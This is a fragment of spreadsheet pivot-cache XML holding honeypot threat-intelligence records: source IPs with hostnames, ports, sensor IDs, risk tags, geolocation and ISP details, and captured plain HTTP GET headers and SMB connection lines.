    <d v="2025-04-02T22:29:48"/>
    <d v="2024-12-28T17:20:01"/>
    <d v="2025-04-02T22:29:48"/>
    <n v="289"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H31"/>
    <s v="23&amp;&amp;80"/>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2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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7220:b870"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3476"/>
    <x v="3476"/>
    <s v="220-132-174-9.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T22:25:37"/>
    <d v="2024-07-17T11:32:24"/>
    <d v="2025-04-02T22:25:37"/>
    <n v="3194"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H25&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H29"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;36164&amp;&amp;23&amp;&amp;80&amp;&amp;9100&amp;&amp;NA&amp;&amp;43089&amp;&amp;54195"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:dc84:ae09"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3477"/>
    <x v="3477"/>
    <s v="125-228-158-220.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T22:19:15"/>
    <d v="2024-04-14T10:49:44"/>
    <d v="2025-04-02T22:19:15"/>
    <n v="447"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;31876&amp;&amp;23&amp;&amp;80&amp;&amp;9100&amp;&amp;15789"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;GET&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:7de4:9edc"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3478"/>
    <x v="3478"/>
    <s v="NA&amp;&amp;59-127-196-176.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-02T22:15:23"/>
    <d v="2024-04-15T11:34:00"/>
    <d v="2025-04-02T22:15:23"/>
    <n v="159"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H21"/>
    <s v="54218&amp;&amp;23&amp;&amp;9100"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL: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3b7f:c4b0"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3479"/>
    <x v="3479"/>
    <s v="59-126-139-160.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T22:09:30"/>
    <d v="2024-09-08T01:38:00"/>
    <d v="2025-04-02T22:09:30"/>
    <n v="807"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_NTP_H21&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;123&amp;&amp;44215&amp;&amp;53413&amp;&amp;80&amp;&amp;23&amp;&amp;9100"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP: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3b7e:8ba0"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3480"/>
    <x v="3480"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T22:04:45"/>
    <d v="2025-04-02T22:04:45"/>
    <d v="2025-04-02T22:04:45"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'spamsources.fabel.dk': ['unknown']}"/>
    <n v="77"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f2:66ea"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3481"/>
    <x v="3481"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T22:01:00"/>
    <d v="2025-04-02T22:01:00"/>
    <d v="2025-04-02T22:01:00"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="corporate"/>
    <s v="BSNL GSM EastZone"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b62:1e65"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3482"/>
    <x v="3482"/>
    <s v="122-117-98-41.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T21:48:37"/>
    <d v="2024-05-22T22:29:47"/>
    <d v="2025-04-02T21:48:37"/>
    <n v="841"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H27"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;10170&amp;&amp;23&amp;&amp;9100&amp;&amp;NA"/>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2006-07-31"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:7a75:6229"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3483"/>
    <x v="3483"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T21:46:50"/>
    <d v="2024-12-25T10:15:29"/>
    <d v="2025-04-02T21:46:50"/>
    <n v="19"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_SMB_H16"/>
    <s v="1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JI"/>
    <s v="East Java"/>
    <s v="Kota Madiun"/>
    <s v="Madiun"/>
    <s v="1636930"/>
    <s v="NA"/>
    <s v="-7.6298"/>
    <s v="111.524"/>
    <s v="140023"/>
    <s v="Dinas Komunikasi dan Informatika Kota Madiun"/>
    <s v="Pemerintah Kota Madiun"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2020-03-12"/>
    <s v="IDNIC-DISKOMINFOMADIUNKOTA-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.149.121.25,54526)}&amp;&amp;{Data_SMB:Incoming connection (103.149.121.25,55044)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.121.25,54951)}&amp;&amp;{Data_SMB:Incoming connection (103.149.121.25,14201)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.121.25,53660)}&amp;&amp;{Data_SMB:Incoming connection (103.149.121.25,54088)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.121.25,64192)}&amp;&amp;{Data_SMB:Incoming connection (103.149.121.25,61170)}&amp;&amp;{Data_SMB:Incoming connection (103.149.121.25,61567)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6795:7919"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3484"/>
    <x v="3484"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T21:25:08"/>
    <d v="2025-02-27T13:34:46"/>
    <d v="2025-04-02T21:25:08"/>
    <n v="10"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9"/>
    <s v="23&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}&amp;&amp;{Data_SMB:Incoming connection (117.216.17.48,59780)}&amp;&amp;{Data_SMB:Incoming connection (117.216.17.48,59797)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (117.216.17.48,60739)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (117.216.17.48,57519)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (117.216.17.48,58446)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d8:1130"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3485"/>
    <x v="3485"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T21:09:07"/>
    <d v="2025-04-02T21:09:07"/>
    <d v="2025-04-02T21:09:07"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="RJ"/>
    <s v="Rajasthan"/>
    <s v="Jaipur"/>
    <s v="Jaipur"/>
    <s v="1269515"/>
    <s v="302003"/>
    <s v="26.9124"/>
    <s v="75.7873"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75cd:9fcf"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3486"/>
    <x v="3486"/>
    <s v="220-133-134-107.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T21:04:43"/>
    <d v="2024-09-11T04:06:00"/>
    <d v="2025-04-02T21:04:43"/>
    <n v="409"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
